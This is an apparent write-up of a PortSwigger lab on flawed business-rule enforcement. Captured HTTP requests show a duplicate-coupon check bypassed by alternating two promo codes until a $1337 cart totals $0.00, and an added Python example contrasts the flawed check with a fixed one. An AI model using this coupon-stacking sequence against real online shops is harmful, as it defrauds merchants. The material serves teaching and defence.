PortSwigger: Flawed enforcement of business rules

Flawed enforcement of business rules

Solution

Get the promo codes from the website

First promo code shown on the website:
New customers use code at checkout: NEWCUST5
---
Second promo code shown on the website:
Use coupon SIGNUP30 at checkout!
---
POST /sign-up HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gqUXya8cZimDTZECpvSVEAHVuLJa44Id&email%2F=pentest%40localhost.pl
---
GET /?sign-up-confirmed=true HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Log in to the website as user wiener

POST /login HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gqUXya8cZimDTZECpvSVEAHVuLJa44Id&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Add the product to the cart

POST /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

productId=1&redir=PRODUCT&quantity=1
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Apply the coupons to reduce the price, then buy

The server only rejects a coupon that matches the one applied immediately before it, so the two codes are applied alternately, over and over:
NEWCUST5
SIGNUP30
---
POST /cart/coupon HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=lbcDzs2p96MrMe7i7lZUlVjxJGrmqCHd&coupon=SIGNUP30
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /cart/coupon HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=lbcDzs2p96MrMe7i7lZUlVjxJGrmqCHd&coupon=NEWCUST5
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

---
Response (cart after the alternating coupon applications)

Name                               Price      Quantity
Lightweight "l33t" Leather Jacket  $1337.00   1
SIGNUP30                           -$401.10
NEWCUST5                           -$5.00
SIGNUP30                           -$401.10
NEWCUST5                           -$5.00
SIGNUP30                           -$401.10
NEWCUST5                           -$5.00
SIGNUP30                           -$401.10
Total:                             $0.00

Solved
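The flawed check and its fix, as an added example that is not part of this write-up and not the lab's own code. It models the cart from the response above and replays the alternating coupon sequence twice: once against a rule that only compares the new coupon with the last one applied (the behaviour the lab shows) and once against a rule that checks the new coupon against every coupon already on the order. The coupon types and amounts (30% of the item price for SIGNUP30, a flat $5 for NEWCUST5) and the clamp of the total at $0.00 are assumptions chosen to reproduce the -$401.10 and -$5.00 lines in the response; all class, function and variable names are the example's own.

```python
from dataclasses import dataclass, field
from decimal import Decimal, ROUND_HALF_UP

TWO_PLACES = Decimal("0.01")

# Constructed coupon catalogue. The two codes are the ones shown on the lab site;
# their discount types and amounts are assumptions that reproduce the cart lines
# in the response (30% of $1337.00 = $401.10, and a flat $5.00).
COUPONS = {
    "SIGNUP30": ("percent", Decimal("30")),
    "NEWCUST5": ("fixed", Decimal("5.00")),
}


def discount_for(code: str, subtotal: Decimal) -> Decimal:
    """Discount a single coupon yields against the cart subtotal."""
    kind, amount = COUPONS[code]
    if kind == "percent":
        return (subtotal * amount / 100).quantize(TWO_PLACES, rounding=ROUND_HALF_UP)
    return amount


@dataclass
class Cart:
    items: list                      # (name, unit_price, quantity)
    applied: list = field(default_factory=list)

    def subtotal(self) -> Decimal:
        return sum((price * qty for _, price, qty in self.items), Decimal("0"))

    def total(self) -> Decimal:
        discounts = sum((discount_for(c, self.subtotal()) for c in self.applied), Decimal("0"))
        # Assumption: the shop clamps at zero rather than producing a negative total.
        return max(self.subtotal() - discounts, Decimal("0")).quantize(TWO_PLACES)

    def apply_coupon_flawed(self, code: str) -> str:
        """Flawed rule: the duplicate check only looks at the *last* coupon applied,
        so alternating two valid codes slips past it indefinitely."""
        if code not in COUPONS:
            return "invalid"
        if self.applied and self.applied[-1] == code:
            return "already_applied"
        self.applied.append(code)
        return "ok"

    def apply_coupon_fixed(self, code: str) -> str:
        """Hardened rule: the new code is checked against every coupon already on
        this order, so each code is honoured at most once per order."""
        if code not in COUPONS:
            return "invalid"
        if code in self.applied:
            return "already_applied"
        self.applied.append(code)
        return "ok"


def run_alternating(rule: str, attempts: list) -> tuple:
    """Replay a coupon sequence against a fresh cart holding the lab's jacket and
    return (final total, outcome of each attempt)."""
    cart = Cart(items=[('Lightweight "l33t" Leather Jacket', Decimal("1337.00"), 1)])
    apply = getattr(cart, f"apply_coupon_{rule}")
    outcomes = [apply(code) for code in attempts]
    return cart.total(), outcomes


# The seven applications shown in the cart response: SIGNUP30 and NEWCUST5 alternating.
ATTEMPTS = ["SIGNUP30", "NEWCUST5"] * 3 + ["SIGNUP30"]

if __name__ == "__main__":
    for rule in ("flawed", "fixed"):
        total, outcomes = run_alternating(rule, ATTEMPTS)
        print(f"{rule:>6}: total=${total}  outcomes={outcomes}")
```

Under the flawed rule all seven attempts succeed and the total reaches $0.00, matching the response; under the fixed rule the third and later attempts are rejected and the jacket costs $930.90. The point for a reviewer is that the state used for the check must be the whole order, not the most recent action, and that the total should be recomputed and bounds-checked server-side at checkout rather than trusted from the sequence of earlier requests.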